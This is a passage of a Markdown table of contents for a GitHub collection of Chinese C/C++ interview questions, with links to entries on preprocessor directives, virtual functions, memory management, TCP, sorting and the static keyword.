inti=(j=4,k=8,l=16,m=32);printf(“%d”,i);输出是多少?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#609intij4k8l16m32printfdi%E8%BE%93%E5%87%BA%E6%98%AF%E5%A4%9A%E5%B0%91) ##### [16.7.2 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#610include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.7.3 既然C++中有更好的const为什么还要使用宏?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#611%E6%97%A2%E7%84%B6c%E4%B8%AD%E6%9C%89%E6%9B%B4%E5%A5%BD%E7%9A%84const%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%98%E8%A6%81%E4%BD%BF%E7%94%A8%E5%AE%8F) ##### [16.7.4 重载(overload)和重写(overried,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#612%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.7.5 C++和C定义结构的分别是什么。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#613c%E5%92%8Cc%E5%AE%9A%E4%B9%89%E7%BB%93%E6%9E%84%E7%9A%84%E5%88%86%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.7.6 #include和#include"a.h"有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#614include%E5%92%8Cincludeah%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.7.7 #include和#include“filename.h”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#615include%E5%92%8Cincludefilenameh%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.7.8 C函数可否单独编译?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#616c%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E5%8D%95%E7%8B%AC%E7%BC%96%E8%AF%91) ##### [16.7.9 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#617%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [16.8.1 完成程序,实现对数组的降序排序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#618%E5%AE%8C%E6%88%90%E7%A8%8B%E5%BA%8F%E5%AE%9E%E7%8E%B0%E5%AF%B9%E6%95%B0%E7%BB%84%E7%9A%84%E9%99%8D%E5%BA%8F%E6%8E%92%E5%BA%8F) ##### [16.8.2 delete[]arry和deletearry一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#619deletearry%E5%92%8Cdeletearry%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E) ##### [16.8.3 结合1个你认为比较能体现OOP思想的项目,用UML来描述。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#620%E7%BB%93%E5%90%881%E4%B8%AA%E4%BD%A0%E8%AE%A4%E4%B8%BA%E6%AF%94%E8%BE%83%E8%83%BD%E4%BD%93%E7%8E%B0oop%E6%80%9D%E6%83%B3%E7%9A%84%E9%A1%B9%E7%9B%AE%E7%94%A8uml%E6%9D%A5%E6%8F%8F%E8%BF%B0) ##### [16.8.4 C与C++各自是如何定义常量的?有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#621c%E4%B8%8Ec%E5%90%84%E8%87%AA%E6%98%AF%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E5%B8%B8%E9%87%8F%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [16.8.5 头文件中的ifndef/define/endif干什么用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#622%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84ifndefdefineendif%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8) ##### [16.8.6 C++中为什么用模板类。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#623c%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88%E7%94%A8%E6%A8%A1%E6%9D%BF%E7%B1%BB) ##### [16.8.7 动态连接库的两种方式?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#624%E5%8A%A8%E6%80%81%E8%BF%9E%E6%8E%A5%E5%BA%93%E7%9A%84%E4%B8%A4%E7%A7%8D%E6%96%B9%E5%BC%8F) ##### [16.8.8 在什么时候需要使用“常引用”?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#625%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E9%9C%80%E8%A6%81%E4%BD%BF%E7%94%A8%E5%B8%B8%E5%BC%95%E7%94%A8) ##### [16.8.9 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#626%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.9.1 GCC3.2.2版本中支持哪几种编程语言。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#627gcc322%E7%89%88%E6%9C%AC%E4%B8%AD%E6%94%AF%E6%8C%81%E5%93%AA%E5%87%A0%E7%A7%8D%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80) ##### [16.9.2 已知strcpy的函数原型:charstrcpy(charstrDest,constchar*strSrc)其中strDest是目的字符串,strSrc是源字符串。不调用C++/C的字符串库函数,请编写函数strcpy。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#628%E5%B7%B2%E7%9F%A5strcpy%E7%9A%84%E5%87%BD%E6%95%B0%E5%8E%9F%E5%9E%8Bcharstrcpycharstrdestconstcharstrsrc%E5%85%B6%E4%B8%ADstrdest%E6%98%AF%E7%9B%AE%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2strsrc%E6%98%AF%E6%BA%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%8D%E8%B0%83%E7%94%A8cc%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%BA%93%E5%87%BD%E6%95%B0%E8%AF%B7%E7%BC%96%E5%86%99%E5%87%BD%E6%95%B0strcpy) ##### [16.9.3 重载(overload)和重写(overried,有的书也叫做“覆盖”)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#629%E9%87%8D%E8%BD%BDoverload%E5%92%8C%E9%87%8D%E5%86%99overried%E6%9C%89%E7%9A%84%E4%B9%A6%E4%B9%9F%E5%8F%AB%E5%81%9A%E8%A6%86%E7%9B%96%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.9.4 多重继承如何消除向上继承的二义性。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#630%E5%A4%9A%E9%87%8D%E7%BB%A7%E6%89%BF%E5%A6%82%E4%BD%95%E6%B6%88%E9%99%A4%E5%90%91%E4%B8%8A%E7%BB%A7%E6%89%BF%E7%9A%84%E4%BA%8C%E4%B9%89%E6%80%A7) ##### [16.9.5 #include与#include“file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#631include%E4%B8%8Eincludefileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [16.9.6 对数据库的一张表进行操作,同时要对另一张表进行操作,如何实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#632%E5%AF%B9%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E4%B8%80%E5%BC%A0%E8%A1%A8%E8%BF%9B%E8%A1%8C%E6%93%8D%E4%BD%9C%E5%90%8C%E6%97%B6%E8%A6%81%E5%AF%B9%E5%8F%A6%E4%B8%80%E5%BC%A0%E8%A1%A8%E8%BF%9B%E8%A1%8C%E6%93%8D%E4%BD%9C%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0) ##### [16.9.7 #include<filename.h>和#include“filename.h”有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#633includefilenameh%E5%92%8Cincludefilenameh%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [16.9.8 预处理器标识#error的目的是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#634%E9%A2%84%E5%A4%84%E7%90%86%E5%99%A8%E6%A0%87%E8%AF%86error%E7%9A%84%E7%9B%AE%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88) ##### [16.9.9 头文件的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#635%E5%A4%B4%E6%96%87%E4%BB%B6%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.1.1 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#636%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [17.1.2 delete[]arry和deletearry一样吗?不一样请说明;](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#637deletearry%E5%92%8Cdeletearry%E4%B8%80%E6%A0%B7%E5%90%97%E4%B8%8D%E4%B8%80%E6%A0%B7%E8%AF%B7%E8%AF%B4%E6%98%8E) ##### [17.1.3 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#638%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [17.1.4 请简述以下两个for循环的优缺点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#639%E8%AF%B7%E7%AE%80%E8%BF%B0%E4%BB%A5%E4%B8%8B%E4%B8%A4%E4%B8%AAfor%E5%BE%AA%E7%8E%AF%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9) ##### [17.1.5 构造函数可否是虚汗数,为什么?析构函数呢,可否是纯虚的呢?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#640%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%8F%AF%E5%90%A6%E6%98%AF%E8%99%9A%E6%B1%97%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%91%A2%E5%8F%AF%E5%90%A6%E6%98%AF%E7%BA%AF%E8%99%9A%E7%9A%84%E5%91%A2) ##### [17.1.6 在C++程序中调用被C编译器编译后的函数,为什么要加extern"C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#641%E5%9C%A8c%E7%A8%8B%E5%BA%8F%E4%B8%AD%E8%B0%83%E7%94%A8%E8%A2%ABc%E7%BC%96%E8%AF%91%E5%99%A8%E7%BC%96%E8%AF%91%E5%90%8E%E7%9A%84%E5%87%BD%E6%95%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E5%8A%A0externc) ##### [17.1.7 请写出下面代码在32位平台上的运行结果,并说明sizeof的性质:](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#642%E8%AF%B7%E5%86%99%E5%87%BA%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E5%9C%A832%E4%BD%8D%E5%B9%B3%E5%8F%B0%E4%B8%8A%E7%9A%84%E8%BF%90%E8%A1%8C%E7%BB%93%E6%9E%9C%E5%B9%B6%E8%AF%B4%E6%98%8Esizeof%E7%9A%84%E6%80%A7%E8%B4%A8) ##### [17.1.8 高级通信包括信号量,——-,——–](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#643%E9%AB%98%E7%BA%A7%E9%80%9A%E4%BF%A1%E5%8C%85%E6%8B%AC%E4%BF%A1%E5%8F%B7%E9%87%8F-) ##### [17.1.9 关联、聚合(Aggregation)以及组合(Composition)的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#644%E5%85%B3%E8%81%94%E8%81%9A%E5%90%88aggregation%E4%BB%A5%E5%8F%8A%E7%BB%84%E5%90%88composition%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.2.1 尽管不像非嵌入式计算机那么常见,嵌入式系统还是有从堆(heap)中动态分配内存的过程的。那么嵌入式系统中,动态分配内存可能发生的问题是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#645%E5%B0%BD%E7%AE%A1%E4%B8%8D%E5%83%8F%E9%9D%9E%E5%B5%8C%E5%85%A5%E5%BC%8F%E8%AE%A1%E7%AE%97%E6%9C%BA%E9%82%A3%E4%B9%88%E5%B8%B8%E8%A7%81%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E8%BF%98%E6%98%AF%E6%9C%89%E4%BB%8E%E5%A0%86heap%E4%B8%AD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E5%86%85%E5%AD%98%E7%9A%84%E8%BF%87%E7%A8%8B%E7%9A%84%E9%82%A3%E4%B9%88%E5%B5%8C%E5%85%A5%E5%BC%8F%E7%B3%BB%E7%BB%9F%E4%B8%AD%E5%8A%A8%E6%80%81%E5%88%86%E9%85%8D%E5%86%85%E5%AD%98%E5%8F%AF%E8%83%BD%E5%8F%91%E7%94%9F%E7%9A%84%E9%97%AE%E9%A2%98%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.2.2 请问运行Test函数会有什么样的结果?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#646%E8%AF%B7%E9%97%AE%E8%BF%90%E8%A1%8Ctest%E5%87%BD%E6%95%B0%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E6%A0%B7%E7%9A%84%E7%BB%93%E6%9E%9C) ##### [17.2.3 多态的实现](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#647%E5%A4%9A%E6%80%81%E7%9A%84%E5%AE%9E%E7%8E%B0) ##### [17.2.4 Cpp四种强制类型转换](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#648cpp%E5%9B%9B%E7%A7%8D%E5%BC%BA%E5%88%B6%E7%B1%BB%E5%9E%8B%E8%BD%AC%E6%8D%A2) ##### [17.2.5 类的static成员的特点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#649%E7%B1%BB%E7%9A%84static%E6%88%90%E5%91%98%E7%9A%84%E7%89%B9%E7%82%B9) ##### [17.2.6 指针和引用的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#650%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.2.7 谈谈对Cpp内存的理解](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#651%E8%B0%88%E8%B0%88%E5%AF%B9cpp%E5%86%85%E5%AD%98%E7%9A%84%E7%90%86%E8%A7%A3) ##### [17.2.8 谈谈new、delete、malloc、free](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#652%E8%B0%88%E8%B0%88newdeletemallocfree) ##### [17.2.9 const关键字](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#653const%E5%85%B3%E9%94%AE%E5%AD%97) ##### [17.3.1 知道STL吗,挑两个你最常用的容器说一说](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#654%E7%9F%A5%E9%81%93stl%E5%90%97%E6%8C%91%E4%B8%A4%E4%B8%AA%E4%BD%A0%E6%9C%80%E5%B8%B8%E7%94%A8%E7%9A%84%E5%AE%B9%E5%99%A8%E8%AF%B4%E4%B8%80%E8%AF%B4) ##### [17.3.2 怎么确定一个程序是C编译的还是C++编译的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#655%E6%80%8E%E4%B9%88%E7%A1%AE%E5%AE%9A%E4%B8%80%E4%B8%AA%E7%A8%8B%E5%BA%8F%E6%98%AFc%E7%BC%96%E8%AF%91%E7%9A%84%E8%BF%98%E6%98%AFc%E7%BC%96%E8%AF%91%E7%9A%84) ##### [17.3.3 一个文件从源码到可执行文件所经历的过程](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#656%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E4%BB%8E%E6%BA%90%E7%A0%81%E5%88%B0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E6%89%80%E7%BB%8F%E5%8E%86%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [17.3.4 了解C++新特性吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#657%E4%BA%86%E8%A7%A3c%E6%96%B0%E7%89%B9%E6%80%A7%E5%90%97) ##### [17.3.5 什么是纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#658%E4%BB%80%E4%B9%88%E6%98%AF%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [17.3.6 构造函数和析构函数可以为虚函数吗](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#659%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%8F%AF%E4%BB%A5%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97) ##### [17.3.7 栈和堆的区别,什么时候必须使用堆](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#660%E6%A0%88%E5%92%8C%E5%A0%86%E7%9A%84%E5%8C%BA%E5%88%AB%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%BF%85%E9%A1%BB%E4%BD%BF%E7%94%A8%E5%A0%86) ##### [17.3.8 用宏定义实现swap](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#661%E7%94%A8%E5%AE%8F%E5%AE%9A%E4%B9%89%E5%AE%9E%E7%8E%B0swap) ##### [17.3.9 头文件<>和""的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#662%E5%A4%B4%E6%96%87%E4%BB%B6%E5%92%8C%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.4.1 编写string的构造函数、拷贝构造函数、赋值操作符重载和析构函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#663%E7%BC%96%E5%86%99string%E7%9A%84%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E8%B5%8B%E5%80%BC%E6%93%8D%E4%BD%9C%E7%AC%A6%E9%87%8D%E8%BD%BD%E5%92%8C%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0) ##### [17.4.2 进程和线程间的通信方式](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#664%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B%E9%97%B4%E7%9A%84%E9%80%9A%E4%BF%A1%E6%96%B9%E5%BC%8F) ##### [17.4.3 死锁产生的原因和死锁的条件](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#665%E6%AD%BB%E9%94%81%E4%BA%A7%E7%94%9F%E7%9A%84%E5%8E%9F%E5%9B%A0%E5%92%8C%E6%AD%BB%E9%94%81%E7%9A%84%E6%9D%A1%E4%BB%B6) ##### [17.4.4 如何采用单线程处理高并发](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#666%E5%A6%82%E4%BD%95%E9%87%87%E7%94%A8%E5%8D%95%E7%BA%BF%E7%A8%8B%E5%A4%84%E7%90%86%E9%AB%98%E5%B9%B6%E5%8F%91) ##### [17.4.5 线程的状态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#667%E7%BA%BF%E7%A8%8B%E7%9A%84%E7%8A%B6%E6%80%81) ##### [17.4.6 进程的状态](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#668%E8%BF%9B%E7%A8%8B%E7%9A%84%E7%8A%B6%E6%80%81) ##### [17.4.7 系统调用brk和mmap](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#669%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8brk%E5%92%8Cmmap) ##### [17.4.8 说说三种内存管理机制](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#670%E8%AF%B4%E8%AF%B4%E4%B8%89%E7%A7%8D%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86%E6%9C%BA%E5%88%B6) ##### [17.4.9 大端和小端,用C++代码怎么确定](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#671%E5%A4%A7%E7%AB%AF%E5%92%8C%E5%B0%8F%E7%AB%AF%E7%94%A8c%E4%BB%A3%E7%A0%81%E6%80%8E%E4%B9%88%E7%A1%AE%E5%AE%9A) ##### [17.5.1 TCP和UDP的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#672tcp%E5%92%8Cudp%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.5.2 TCP三次握手](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#673tcp%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B) ##### [17.5.3 三次握手的原因](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#674%E4%B8%89%E6%AC%A1%E6%8F%A1%E6%89%8B%E7%9A%84%E5%8E%9F%E5%9B%A0) ##### [17.5.4 TCP四次挥手](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#675tcp%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B) ##### [17.5.5 四次挥手的原因](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#676%E5%9B%9B%E6%AC%A1%E6%8C%A5%E6%89%8B%E7%9A%84%E5%8E%9F%E5%9B%A0) ##### [17.5.6 TIME_WAIT](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#677time_wait) ##### [17.5.7 Http协议](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#678http%E5%8D%8F%E8%AE%AE) ##### [17.5.8 几种常见的排序算法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#679%E5%87%A0%E7%A7%8D%E5%B8%B8%E8%A7%81%E7%9A%84%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95) ##### [17.5.9 链表的一些性质和操作](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#680%E9%93%BE%E8%A1%A8%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%A7%E8%B4%A8%E5%92%8C%E6%93%8D%E4%BD%9C) ##### [17.6.1 常见的查找算法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#681%E5%B8%B8%E8%A7%81%E7%9A%84%E6%9F%A5%E6%89%BE%E7%AE%97%E6%B3%95) ##### [17.6.2 动态规划](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#682%E5%8A%A8%E6%80%81%E8%A7%84%E5%88%92) ##### [17.6.3 关键字 static 的作用是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#683%E5%85%B3%E9%94%AE%E5%AD%97-static-%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.6.4 “引用”与指针的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#684%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.6.5 ..h 头文件中的 ifndef/define/endif 的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#685h-%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84-ifndefdefineendif-%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [17.6.6 #include 与 #include “file.h”的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#686include-%E4%B8%8E-include-fileh%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [17.6.7 描述实时系统的基本特性](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#687%E6%8F%8F%E8%BF%B0%E5%AE%9E%E6%97%B6%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%9F%BA%E6%9C%AC%E7%89%B9%E6%80%A7) ##### [17.6.8 全局变量和局部变量在内存中是否有区别?如果有,是什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#688%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E5%8C%BA%E5%88%AB%E5%A6%82%E6%9E%9C%E6%9C%89%E6%98%AF%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.6.9 什么是平衡二叉树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#689%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B3%E8%A1%A1%E4%BA%8C%E5%8F%89%E6%A0%91) ##### [17.7.1 堆栈溢出一般是由什么原因导致的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#690%E5%A0%86%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%80%E8%88%AC%E6%98%AF%E7%94%B1%E4%BB%80%E4%B9%88%E5%8E%9F%E5%9B%A0%E5%AF%BC%E8%87%B4%E7%9A%84) ##### [17.7.2 冒泡排序算法的时间复杂度是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#691%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E7%9A%84%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6%E6%98%AF%E4%BB%80%E4%B9%88) ##### [17.7.3 什么函数不能声明为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#692%E4%BB%80%E4%B9%88%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [17.7.4 队列和栈有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#693%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.7.5 不能做 switch()的参数类型](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#694%E4%B8%8D%E8%83%BD%E5%81%9A-switch%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B) ##### [17.7.6 局部变量能否和全局变量重名?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#695%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E8%83%BD%E5%90%A6%E5%92%8C%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E9%87%8D%E5%90%8D) ##### [17.7.7 如何引用一个已经定义过的全局变量?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#696%E5%A6%82%E4%BD%95%E5%BC%95%E7%94%A8%E4%B8%80%E4%B8%AA%E5%B7%B2%E7%BB%8F%E5%AE%9A%E4%B9%89%E8%BF%87%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F) ##### [17.7.8 全局变量可不可以定义在可被多个.C 文件包含的头文件中?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#697%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%8F%AF%E4%B8%8D%E5%8F%AF%E4%BB%A5%E5%AE%9A%E4%B9%89%E5%9C%A8%E5%8F%AF%E8%A2%AB%E5%A4%9A%E4%B8%AAc-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%A4%B4%E6%96%87%E4%BB%B6%E4%B8%AD%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [17.7.9 语句 for( ;1 ;)有什么问题?它是什么意思?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#698%E8%AF%AD%E5%8F%A5-for-1-%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%AE%83%E6%98%AF%E4%BB%80%E4%B9%88%E6%84%8F%E6%80%9D) ##### [17.8.1 do……while 和 while……do 有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#699dowhile-%E5%92%8C-whiledo-%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [17.8.2 statac 全局变量、局部变量、函数与普通全局变量、局部变量、函数 static 全局变量与普通的全局变量有什么区别?static局部变量和普通局部变量有什么区别? static 